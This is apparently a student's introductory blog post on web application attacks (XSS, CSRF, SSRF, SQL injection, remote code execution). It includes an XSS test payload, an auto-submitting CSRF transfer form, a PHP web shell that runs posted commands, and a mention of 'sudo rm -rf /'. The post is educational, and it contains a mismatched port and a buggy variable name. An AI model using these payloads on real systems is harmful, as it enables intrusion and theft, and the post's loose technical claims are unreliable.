The Web Application Attacks Basic to get started in Brief

Hmm…. So you want to learn Web Application Hacking, Okay, so let me help you. We’ll begin with some of the basic attacks in brief…

XSS

So the XSS is one of the major Client-Side attack. It stands for Cross-Site Scripting. In this, the attacker is able to execute a piece of malicious code on the Client’s Browser via a trusted site. Okay Okay, let me help you with an example, You go to a trusted social media platform and you see the posts, while scrolling down, the server sends you the malicious post and that comes on your browser and gets executed! Now you are hacked…

How to perform XSS

Ha! XSS is nothing more than execution of JavaScript. Assume that the post appears like this on a social media platform:-

<div id=”post”>This is your post</div>

So the thing we have to do here is to break the code and execute an alert, this can be done by creating the post <script>alert(“XSS”)</script>, so let’s do it, and the code we get is…

<div id=”post”><script>alert(“XSS”)</script></div>

Although this is not a malicious script, but it is used to easily detect XSS.

CSRF

Okay, so CSRF stands for Cross-Site Request Forgery. This is also a type of Client-Side attack in which the attacker is able to perform a sensitive action via creating a script. Let’s understand it with a diagram:-

Okay, So in my bad drawing above, you can see that there’s a malicious script, which will something like this:-

<form hidden onload=”submit()” id=”form” method=”POST” action=”http://vulnerable.site/dash/transaction">

<input name=”from” type=”number” value=”1234567890">

<input name=”to” type=”number” value=”0987654321">

<input name=”amount” value=”9999999">

</form>

<script>

function submit () {

document.getElementById(“form”).submit();

}

</script>

Okay, so what this code will do is auto-submit the form and a request will be made with victim’s cookies, which is something important for a person to login to a web service. When the server will accept the request, it will think that the request is made by the account owner, i.e. victim in this case and the server will do the transaction.

SSRF

Okay, so SSRF stands for Server Side Request Forgery and is a type of Server-side attack. In this attack, the attacker is able to communicate to the internal service and also external service with help of the server. So why communicating to internal or external service is sensitive? Let’s understand this with the help of an example:-

The company has made an internal HTTP service on port 5555 for its developers to manage the website. So, you as a hacker seethe following request going to the server:

Get /api/update_my_blog HTTP/1.1

Host: vuln.host

Accept: */*

Accept-Language: en-us

User-Agent: MyBrowser/1.0

blog=blog_name&password=letmein&change=http://localhost:60000/update/blog/

So, here you can see that the change parameter is having a value containing “localhost”, that can be only accessible by the system itself. Now you as a hacker knows that the server is having a HTTP service on port 5555 to update the site. Now you change the “change” parameter to http://localhost:5555 and Congratulation! !!!You hacked the site!!!

SQLi

SQLi stands for SQL Injection. SQL is a type of database. In this type of attack, the attacker is able to inject a malicious command (in SQL database, SQL commands are used to manage data). Let’s see an example by an input

Here we see that the payload is just single quote (‘). This will return a SQL error and thus, you can easily hack the server. It is very critical as SQL database stores all the credentials and if accessed unauthorized, you know further.

RCE

So RCE stands for Remote Code Execution. It is also very critical as it allows attacker to execute any code on server. If you talk about POWER OF CODE, anything is possible with code. You can obtain a reverse shell or execute a command including sudo rm -rf / (Warning! the command “sudo rm -rf /is extremely dangerous as it deletes your whole system. I won’t be responsible if you run this command. Do at your own risk)

Okay, so let’s see an example:-

Server code to create a new file (file saving server):-

<?php

$filename = $_POST[“filename”];

$content = $_POST[“content”];

$fn_b64 = base64_encode($filename);

$cn_b64_b64 = base64_encode($content);

$cn_url = urlencode($cn_b64);

$fn_url = urlencode($fn_b64);

$save_file = file_get_contents(“http://localhost:5432/?filename=$fn_url&content=$cn_url");

?>

Okay, so let me explain the above code in brief. First of all, the input is base64 encoded and then URL encoded to send to to a file managing internal service (unfortunately SSRF isn’t possible with this code), then the internal service save it to “/uploads/user/filename.ext”.

So now, we upload a file named as payload.php to the server. Payload code is:-

<?php

$cmd = $_POST[“cmd”];

echo shell_exec($cmd);

?>

Okay, so this code will execute cmd parameter in POST request and then return the output of the command. Now we can play around with the command line!

So now, I hope that this post will help you out to get started with “Web Application Hacking”.

Thanks for Reading

School Student and CyberSec Enthusiast